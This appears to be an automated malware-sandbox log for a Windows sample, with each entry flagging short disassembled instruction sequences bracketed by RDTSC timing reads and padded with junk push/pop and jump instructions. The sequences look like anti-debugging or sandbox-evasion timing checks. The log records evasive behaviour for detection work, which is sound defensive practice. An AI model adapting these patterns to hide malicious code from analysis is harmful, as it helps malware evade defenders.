Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBF6B6 second address: BBF6C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC0DCB second address: BC0E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624B4E7E2h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007FF624B4E7E6h 0x00000013 jmp 00007FF624B4E7E0h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FF624B4E7DCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC0E07 second address: BC0E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC0E0B second address: BC0E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3E49F second address: B3E4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC38ED second address: BC38FA instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC38FA second address: BC3900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8490 second address: BC8499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8499 second address: BC84B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75305h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC84B4 second address: BC84B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC860A second address: BC8610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8610 second address: BC8618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8618 second address: BC861D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC861D second address: BC8622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC878A second address: BC8797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8797 second address: BC87B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF624B4E7E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FF624B4E7D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC87B9 second address: BC87C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC894A second address: BC8968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FF624B4E7FDh 0x0000000b pushad 0x0000000c jmp 00007FF624B4E7DEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8AEF second address: BC8B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF624C75303h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF624C75309h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8B23 second address: BC8B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCE978 second address: BCE986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF624C752F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD482 second address: BCD4AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FF624B4E7DCh 0x0000000f jbe 00007FF624B4E7D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD4AB second address: BCD4D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624C752FCh 0x00000008 jmp 00007FF624C75304h 0x0000000d popad 0x0000000e js 00007FF624C752FEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD4D7 second address: BCD4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FF624B4E7FBh 0x0000000e pushad 0x0000000f jmp 00007FF624B4E7E3h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD4FB second address: BCD505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD7B0 second address: BCD7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD7B6 second address: BCD7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD94C second address: BCD951 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD951 second address: BCD968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C752FEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD968 second address: BCD9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF624B4E808h 0x0000000e push edx 0x0000000f jnp 00007FF624B4E7D6h 0x00000015 pop edx 0x00000016 pushad 0x00000017 jmp 00007FF624B4E7E8h 0x0000001c jmp 00007FF624B4E7DAh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCDACB second address: BCDADB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF624C752F6h 0x00000008 jns 00007FF624C752F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCDADB second address: BCDAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF624B4E7DCh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCDC63 second address: BCDC84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF624C75307h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCDC84 second address: BCDC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCE68D second address: BCE691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0E7F second address: BD0E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0E86 second address: BD0E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0E8C second address: BD0E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FF89 second address: B3FF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD740D second address: BD743A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b ja 00007FF624B4E7D6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 jmp 00007FF624B4E7DFh 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FF624B4E7D6h 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD743A second address: BD7440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD7598 second address: BD759C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD759C second address: BD75A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75A2 second address: BD75AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007FF624B4E7D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75AF second address: BD75CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75300h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF624C752F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75CC second address: BD75FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF624B4E7D6h 0x00000008 jmp 00007FF624B4E7DBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FF624B4E7DCh 0x00000019 je 00007FF624B4E7D6h 0x0000001f jc 00007FF624B4E7DEh 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75FB second address: BD75FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75FF second address: BD7606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD7E46 second address: BD7E52 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624C752F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD7E52 second address: BD7E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007FF624B4E7D6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jnl 00007FF624B4E7EAh 0x00000014 jmp 00007FF624B4E7E4h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD890C second address: BD895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF624C75303h 0x0000000d jmp 00007FF624C752FAh 0x00000012 push eax 0x00000013 jmp 00007FF624C75305h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF624C75302h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8C20 second address: BD8C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8C26 second address: BD8C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF624C752F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e jp 00007FF624C752F6h 0x00000014 jbe 00007FF624C752F6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jnc 00007FF624C752F6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE105D second address: BE1068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE01DB second address: BE01DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE05A3 second address: BE05A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE05A7 second address: BE05B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF624C752F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE05B7 second address: BE05BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0746 second address: BE074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE074E second address: BE0754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0754 second address: BE075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE075F second address: BE0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0763 second address: BE0787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF624C75307h 0x0000000e jmp 00007FF624C75301h 0x00000013 push eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE09F7 second address: BE09FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0BAD second address: BE0BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75305h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0D1C second address: BE0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0D20 second address: BE0D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF624C752FEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE68C4 second address: BE68CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE68CD second address: BE68D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE69FA second address: BE69FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE69FE second address: BE6A1B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C752FFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6A1B second address: BE6A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6CFC second address: BE6D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF624C75304h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6EA0 second address: BE6EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6FF9 second address: BE7006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FF624C752F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7006 second address: BE700A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE746B second address: BE7482 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF624C75301h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7E9F second address: BE7EAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE857F second address: BE858D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C752FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE858D second address: BE8591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF994 second address: BEF99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF592 second address: BEF596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF596 second address: BEF5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF624C75302h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF5A4 second address: BEF5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF5AE second address: BEF5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB840 second address: BFB846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB846 second address: BFB84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB84A second address: BFB84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB84E second address: BFB854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB854 second address: BFB866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB866 second address: BFB86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB86A second address: BFB88C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 jmp 00007FF624B4E7DFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB88C second address: BFB890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB890 second address: BFB896 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD33C second address: BFD35A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C75309h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD35A second address: BFD37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624B4E7E7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD37B second address: BFD37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B393E5 second address: B393EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD1D6 second address: BFD1E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD1E0 second address: BFD1EC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF624B4E7DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0131F second address: C01323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0678E second address: C06794 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D6F4 second address: B2D6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
